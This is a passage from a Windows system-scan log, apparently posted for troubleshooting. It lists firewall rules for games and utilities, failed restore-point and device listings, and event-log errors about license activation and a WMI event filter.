FirewallRules: [TCP Query User{26F32E06-8C99-4C4E-A88C-110F0BC5DEB9}D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll] => (Allow) D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll
FirewallRules: [UDP Query User{C97AC77B-B9AB-4ACF-BD03-C9C9FD6606B1}D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll] => (Allow) D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll
FirewallRules: [{638BA54D-2635-4759-BDFC-2D46474B6D37}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{E9B6E224-F758-479F-8277-959B1D50D0E5}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{1FE04074-9729-4611-A59B-6D1AD71FD0C4}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{3280B250-6F0E-46DD-8C7B-3AEE07BD6DA7}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{547FC444-5AC5-4171-8C2B-BC25DA6AD60F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{A70540E2-2F15-4B16-8EBF-9223237DB1D7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{B7FB3B81-9945-4456-AB4E-F3F462731DE7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE_executable.exe
FirewallRules: [{8D737F82-F9FE-4C2D-9234-9B6578374AE1}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE_executable.exe
FirewallRules: [{281F067D-4520-4004-80F6-32A0E6089BD1}] => (Allow) C:\Program Files\HP\HP ENVY 4520 series\Bin\DeviceSetup.exe
FirewallRules: [{070E3BD2-A6A8-4891-97D6-A4D2D79B90ED}] => (Allow) LPort=5357
FirewallRules: [{BC6962E0-A9E1-45E9-8CF2-F4BA0CE26FFF}] => (Allow) C:\Program Files\HP\HP ENVY 4520 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [TCP Query User{5561F357-1028-459A-B796-A4D123A8600D}D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe] => (Allow) D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe
FirewallRules: [UDP Query User{12859DF5-D5D5-4025-B2F8-E39E76CBB2AA}D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe] => (Allow) D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe
FirewallRules: [TCP Query User{7EE8CDD9-35C7-430D-95D8-451C632D7DCF}D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe] => (Allow) D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe
FirewallRules: [UDP Query User{F311FB22-AA27-4EC6-8AE7-1D9691835D1C}D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe] => (Allow) D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe
FirewallRules: [{33E129CF-48F9-46CD-BCC7-DD8BA14AF12D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Overcooked\Overcooked.exe
FirewallRules: [{16831414-067E-45D0-A4D5-E68B529DB6D5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Overcooked\Overcooked.exe
FirewallRules: [{50A06F50-7F3D-4BDC-9021-237A4C0B2C27}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Atlas Reactor\GlyphClient.exe
FirewallRules: [{1B14D338-DD94-4F52-AD5C-19A32CD5A7BC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Atlas Reactor\GlyphClient.exe
FirewallRules: [TCP Query User{4C44DD46-D7A9-4196-8296-EEC3056A05BA}D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe] => (Block) D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe
FirewallRules: [UDP Query User{0E56461D-D37A-4C4F-A638-64AA8F253EF7}D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe] => (Block) D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe
FirewallRules: [TCP Query User{7B48B31B-0302-4CA8-9E87-F07AB35F2D86}D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe
FirewallRules: [UDP Query User{0CAAB1E6-B8C4-4C54-8EED-E55C7FFDD98D}D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe
FirewallRules: [{4EE9956F-18E1-400E-BF78-B16CA5740983}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Dedicated Server\EmpyrionLauncher.exe
FirewallRules: [{1F4F4B1F-6EB7-49F2-BEB5-C5D20017F534}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Dedicated Server\EmpyrionLauncher.exe
FirewallRules: [{4E13484E-599F-4A55-8783-90ECC346BE91}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Galactic Survival\EmpyrionLauncher.exe
FirewallRules: [{EB02CC0B-C01C-4CF1-B865-43DD5B64DA66}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Galactic Survival\EmpyrionLauncher.exe
FirewallRules: [{56A01BA7-991A-4E71-996A-9DB735036A2A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot\lancealot.exe
FirewallRules: [{164D6B17-3E23-4D7A-8EC8-9B92D2908A27}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot\lancealot.exe
FirewallRules: [VirtualPC-In-UDP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-UDP-2] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-TCP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [TCP Query User{EAEAB11E-0749-492A-83F8-9E619C0825FB}D:\spel\company of heroes\bugreport\bugreport.exe] => (Block) D:\spel\company of heroes\bugreport\bugreport.exe
FirewallRules: [UDP Query User{3A908214-3ACB-45F3-87BB-034C922C2A9D}D:\spel\company of heroes\bugreport\bugreport.exe] => (Block) D:\spel\company of heroes\bugreport\bugreport.exe
FirewallRules: [{BC279C92-F389-439A-AA3C-F8FC24E7E3E0}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{54C5FE03-560A-42F0-A953-CC57545F85F2}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{09DF48B2-2698-410B-B67C-DB382410B87B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Portal 2\portal2.exe
FirewallRules: [{89F025E4-A12F-4D64-8F4E-65A58D8FF1E4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Portal 2\portal2.exe
FirewallRules: [TCP Query User{5A0AE274-1115-456E-8097-7259AE6A531D}D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe
FirewallRules: [UDP Query User{15BE3688-275A-40F9-8987-65CFDE79CC41}D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe
FirewallRules: [{6A1EE22B-EFB5-403F-96B8-92BF6419D6D3}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe
FirewallRules: [{4F8E8B43-EDDE-423A-AFB4-558A6797AA1B}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe
FirewallRules: [{587354FE-5AA4-40B2-8BE8-3F068F603006}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Duck Game\DuckGame.exe
FirewallRules: [{2F20DB6C-39DB-42F5-B0EA-93724F169BF7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Duck Game\DuckGame.exe
FirewallRules: [{CEE996FE-EC7E-4B5B-83A4-8D572D4710AC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\TowerFall\TowerFall.exe
FirewallRules: [{66553191-FBFE-4728-8CDE-F8A61645C7E4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\TowerFall\TowerFall.exe
FirewallRules: [{BEC5AC23-37B2-40FD-8357-3AEC0079BE6C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Planet Coaster\PlanetCoaster.exe
FirewallRules: [{D8EFC4A0-1905-4C93-9620-035D8AA25691}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Planet Coaster\PlanetCoaster.exe
FirewallRules: [{ACD083CA-B56C-4A63-AC29-54CF6A0CD632}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Samorost 3\Samorost3.exe
FirewallRules: [{C888B48B-D53E-439A-AC80-145CA44D4737}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Samorost 3\Samorost3.exe
FirewallRules: [TCP Query User{E3430B03-1B85-4352-B782-0FA31716971E}D:\spel\uplay library\forhonor\forhonor.exe] => (Allow) D:\spel\uplay library\forhonor\forhonor.exe
FirewallRules: [UDP Query User{9283DBC8-33C0-43B5-9651-F441DC55A6DF}D:\spel\uplay library\forhonor\forhonor.exe] => (Allow) D:\spel\uplay library\forhonor\forhonor.exe
FirewallRules: [TCP Query User{105F511A-3CF6-48F6-AD6C-051E9FEF4601}D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe] => (Block) D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe
FirewallRules: [UDP Query User{41437AF0-DE88-4AFA-A0CB-DAA1B25D218B}D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe] => (Block) D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe
FirewallRules: [{90F7FC5D-4BDC-4E25-81CF-7F277BC7091B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mainlining\MainliningGame.exe
FirewallRules: [{DBC3A232-DF3B-4592-AAD9-5AD7C9E8EF26}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mainlining\MainliningGame.exe
FirewallRules: [{11C7801C-EA50-48C3-B975-C7808EBB34BA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\River City Ransom Underground\RCRU.exe
FirewallRules: [{A402D5BB-ACD3-4564-8602-D1C3AFE8A5FC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\River City Ransom Underground\RCRU.exe
FirewallRules: [TCP Query User{90E2740D-4865-43C6-91D4-B44837FB7951}D:\spel\doom\doomx64.exe] => (Block) D:\spel\doom\doomx64.exe
FirewallRules: [UDP Query User{91DD21ED-6B7D-4517-ABA8-25131C27A725}D:\spel\doom\doomx64.exe] => (Block) D:\spel\doom\doomx64.exe
FirewallRules: [{0E9497B1-EDF3-4BDA-84E8-C4AF819F2B1F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\BETA\Binaries\Win32\DepthGame.exe
FirewallRules: [{DE8F4F0F-22D5-4E28-9D99-3E79A12D25D0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\BETA\Binaries\Win32\DepthGame.exe
FirewallRules: [TCP Query User{392BB40D-09A3-46AE-B483-4A87F354BBE3}D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe
FirewallRules: [UDP Query User{02BF2D2B-EBEA-47F5-B4FA-A51CBA9A9C83}D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe
FirewallRules: [TCP Query User{94065ED6-5B78-4044-AE30-8E49C3C21237}D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe] => (Block) D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe
FirewallRules: [UDP Query User{27CA16C0-9AB9-4376-AE22-9AA13C815A01}D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe] => (Block) D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe
FirewallRules: [TCP Query User{FF88AE80-179E-4787-99D1-9D9601F0F888}D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [UDP Query User{DE54AA93-CF4F-4466-966B-16CCAAB5E2AF}D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [{1A5EA0B5-372C-4636-865C-96EB70C2B9F8}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{0289A623-6B29-4123-AFAD-83CC04D6E3D1}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{094AA815-F657-443A-BD7D-E8BF39CB1875}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\Beta\AwesomenautsLauncher.exe
FirewallRules: [{E6B49A1F-10BF-4C9D-939D-AF1B9D814811}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\Beta\AwesomenautsLauncher.exe
FirewallRules: [TCP Query User{1B0D9DFE-155E-4872-9EA3-EB0B754A22E9}D:\spel\factorio_0.15.22\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.15.22\bin\x64\factorio.exe
FirewallRules: [UDP Query User{9BB74597-A81A-4634-BF7E-27D90AAE1515}D:\spel\factorio_0.15.22\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.15.22\bin\x64\factorio.exe
FirewallRules: [TCP Query User{A7B37CFC-0381-42BE-827A-63D6A4C34FC8}D:\spel\vikings - wolves of midgard\vikings.exe] => (Allow) D:\spel\vikings - wolves of midgard\vikings.exe
FirewallRules: [UDP Query User{639643C1-BDF4-477C-AD00-3FB55B221BC8}D:\spel\vikings - wolves of midgard\vikings.exe] => (Allow) D:\spel\vikings - wolves of midgard\vikings.exe
FirewallRules: [{2CAC80C4-1DD7-4ED9-AAC9-FA728E9C64C2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\spacegame\Binaries\Win64\Fractured Space.exe
FirewallRules: [{59E06B2C-F0B8-4FD2-8C95-E33BA71B7A52}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\spacegame\Binaries\Win64\Fractured Space.exe
FirewallRules: [TCP Query User{49813E33-F982-4C58-AABE-7AE5DDBB53B7}D:\spel\gauntlet slayer edition\binaries\gauntlet.exe] => (Block) D:\spel\gauntlet slayer edition\binaries\gauntlet.exe
FirewallRules: [UDP Query User{97BB371E-37DD-4871-A9B2-479DDB116DAB}D:\spel\gauntlet slayer edition\binaries\gauntlet.exe] => (Block) D:\spel\gauntlet slayer edition\binaries\gauntlet.exe
FirewallRules: [TCP Query User{AE8E1853-0B69-458C-A91B-357C96D672CA}D:\spel\starcraft ii\versions\base56787\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base56787\sc2_x64.exe
FirewallRules: [UDP Query User{6309873B-0312-49FF-93AF-7FC0CEE92B2B}D:\spel\starcraft ii\versions\base56787\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base56787\sc2_x64.exe
FirewallRules: [TCP Query User{2B66DABB-08DB-4347-B883-42E57A1977E7}D:\spel\divinity original sin 2\bin\eocapp.exe] => (Block) D:\spel\divinity original sin 2\bin\eocapp.exe
FirewallRules: [UDP Query User{B796F551-898A-414D-9130-087E8CDA4764}D:\spel\divinity original sin 2\bin\eocapp.exe] => (Block) D:\spel\divinity original sin 2\bin\eocapp.exe
FirewallRules: [{943F2851-ECFB-4B76-8DB5-790A4F3A2A60}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe
FirewallRules: [{8C09611D-DED5-4A47-9CAD-6B5D30F07DEF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe
FirewallRules: [TCP Query User{B57AE43D-9BD7-4625-9167-9682B1214B8E}D:\spel\starcraft ii\versions\base57507\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base57507\sc2_x64.exe
FirewallRules: [UDP Query User{F54F1B03-C911-4118-898E-C4C6741ED54C}D:\spel\starcraft ii\versions\base57507\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base57507\sc2_x64.exe
FirewallRules: [{A53DA5D6-B330-4B94-9BAD-CBFA322598D2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\BreachAndClear\bnc.exe
FirewallRules: [{0989A382-7FB7-49BD-8948-BB4D18E829E3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\BreachAndClear\bnc.exe
FirewallRules: [{86ECB8A3-9E4D-4BA6-8848-DF1BC1D6BD38}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot Enhanced Edition\lancealot.exe
FirewallRules: [{FB8EF655-CB2D-40B2-BC0A-EE99B096DB04}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot Enhanced Edition\lancealot.exe
FirewallRules: [{1AABF3A0-0D09-40C2-A9AA-0CB0D8D57BF0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\HardWest\HardWest.exe
FirewallRules: [{D9690832-509B-45D6-9409-03836DE16213}] => (Allow) D:\Spel\Steam Library\SteamApps\common\HardWest\HardWest.exe
FirewallRules: [TCP Query User{4D4A7CFE-E3AD-42FE-9ABC-F15ACA432415}D:\spel\satellite reign\satellitereignwindows.exe] => (Allow) D:\spel\satellite reign\satellitereignwindows.exe
FirewallRules: [UDP Query User{B43EA068-17FF-4825-80F1-B7BEA12DBA14}D:\spel\satellite reign\satellitereignwindows.exe] => (Allow) D:\spel\satellite reign\satellitereignwindows.exe
FirewallRules: [{E12C1E12-8918-47BF-9BF0-BB81766D03BA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aragami\Aragami.exe
FirewallRules: [{A2AE5D14-6FD2-41C1-9980-F2E7E63537F2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aragami\Aragami.exe
FirewallRules: [TCP Query User{EAEA4C7A-39C4-439B-A5A3-BC1B39F3E633}D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe] => (Block) D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe
FirewallRules: [UDP Query User{AE9B677E-82BF-4BD9-A500-9799B4349C4F}D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe] => (Block) D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe
FirewallRules: [{C07BD8B9-20CF-40B2-A390-051F5AF605EF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Spintires MudRunner\MudRunner.exe
FirewallRules: [{7E02B52F-A3D5-4771-94A8-9E1BC9A92AE0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Spintires MudRunner\MudRunner.exe
FirewallRules: [TCP Query User{0BC64E8E-D097-4302-8DE7-C52133F3F820}D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [UDP Query User{3F6D9C6D-0D88-42B3-A45B-22E3876F89E7}D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [{41295780-229B-4A41-8874-FA27D76D9D18}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SecretPonchos\bin\SecretPonchosD3D11.exe
FirewallRules: [{7FEB6C09-A3FC-4FE8-8C2F-A73DF3A26029}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SecretPonchos\bin\SecretPonchosD3D11.exe
FirewallRules: [{AE43EF82-F6F7-4C66-9E0E-04BA99ADC5A3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\EvolveGame\Bin64_SteamRetail\Evolve.exe
FirewallRules: [{72A961A6-6F51-4295-8377-36F54B3EDD2D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\EvolveGame\Bin64_SteamRetail\Evolve.exe
FirewallRules: [TCP Query User{51297500-255C-4308-A33D-A59A0226532F}D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe
FirewallRules: [UDP Query User{C086CD1D-6E88-4B53-8234-63A7F7094C27}D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe
FirewallRules: [{B0F4256D-3EB3-4DDB-9525-A5CC400DBC01}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{FD789251-9926-4417-AB50-A72ED2F1CCED}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{478551DD-BFAA-4D54-B66F-4825510EC57B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aven Colony\AvenColony.exe
FirewallRules: [{E87E1A1E-46C6-4F95-A1E6-4CB2F188F244}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aven Colony\AvenColony.exe
FirewallRules: [{4F8620B0-3C73-4A37-BE73-1E679DB228A9}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Strikey Sisters\strikey_sisters.exe
FirewallRules: [{830B508E-2878-4305-82C9-B9B9ADF9AD8D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Strikey Sisters\strikey_sisters.exe
FirewallRules: [{ACB155F9-DBDA-4D65-B643-959BE30D4175}] => (Allow) C:\Program Files\Vivaldi\Application\vivaldi.exe
FirewallRules: [TCP Query User{597DC14B-49DB-40B6-A24A-E3D9953A457D}D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [UDP Query User{A9C2F1E3-849E-4D06-93ED-F0D6A0381D0A}D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [{6E206845-F48F-4619-A3DA-A5516D9D4C5A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\launcher\launcher.exe
FirewallRules: [{CE39CD5A-E51C-48D9-A1E7-2DA4AEF0C6CD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\launcher\launcher.exe
FirewallRules: [{5D35B3A2-F05A-47E7-A169-9FB82F430BF5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Launcher\DCConfig.exe
FirewallRules: [{14725769-536B-4335-A537-4BBAD8646C91}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Launcher\DCConfig.exe
FirewallRules: [{2FFEA717-74A2-4877-89D2-B30E836B1AEE}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Anc\Binaries\Win64\Anc-Win64-Shipping.exe
FirewallRules: [{9EC8F931-3B33-4C1E-8707-F3D9F5D2C37B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Anc\Binaries\Win64\Anc-Win64-Shipping.exe
FirewallRules: [{87FC258F-5BEE-4C60-9620-2854B57C3376}] => (Allow) D:\Spel\Steam Library\SteamApps\common\rocketleague\Binaries\Win32\RocketLeague.exe
FirewallRules: [{6692C423-96D3-48B0-BE61-0A685AA7C369}] => (Allow) D:\Spel\Steam Library\SteamApps\common\rocketleague\Binaries\Win32\RocketLeague.exe
FirewallRules: [TCP Query User{746EE4C5-88A1-49CA-AE82-C024362EC325}D:\spel\unreal tournament goty\system\unrealtournament.exe] => (Allow) D:\spel\unreal tournament goty\system\unrealtournament.exe
FirewallRules: [UDP Query User{1CB765AF-56AD-4340-96E5-5AF7DDC35300}D:\spel\unreal tournament goty\system\unrealtournament.exe] => (Allow) D:\spel\unreal tournament goty\system\unrealtournament.exe
FirewallRules: [{6AA353F1-7DDF-490A-B825-0C9CF5C0597D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\workshop\Workshop.exe
FirewallRules: [{2253BB91-25A5-41A5-A8B1-51264D44C1DC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\workshop\Workshop.exe
FirewallRules: [{F128730D-D7BE-467C-A4BB-0C43215DC4C2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{92BD8855-E433-4E7C-9DA1-BC4ADC152C43}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{4DF2E569-34C8-428A-A8C6-689A8D3132A5}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{180A7648-B41B-49EC-9970-3A15A5246B34}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{CC32B82F-7235-40CF-890F-473BCA9F601D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{45300479-8F32-4A67-916B-F7D53A9DFB52}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{FB9D5CC2-2B07-4B7F-9F63-36452DB69316}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HobLauncher.exe
FirewallRules: [{5B525BF6-E027-4A85-98DB-0B69127E01F5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HobLauncher.exe
FirewallRules: [{E8FF906C-0588-47BE-96E9-0BE363415543}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HOB.exe
FirewallRules: [{986BA986-DD80-4802-9A0A-D9A8D1431284}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HOB.exe
FirewallRules: [{CE43BA91-078E-4D0B-AB12-53C5C0B5839A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service

==================== Restore Points =========================

Could not list restore points
Check "winmgmt" service or repair WMI.


==================== Faulty Device Manager Devices =============

Could not list Devices. Check "winmgmt" service or repair WMI.


==================== Event log errors: =========================

Application errors:
==================
Error: (03/02/2018 11:13:40 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Windows license activation failed. Error 0x80070005.

Error: (03/02/2018 11:12:18 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 11:12:13 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Windows license activation failed. Error 0x80070005.

Error: (03/02/2018 10:24:09 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 09:26:43 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 09:16:43 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 08:35:04 AM) (Source: WinMgmt) (EventID: 10) (User: )
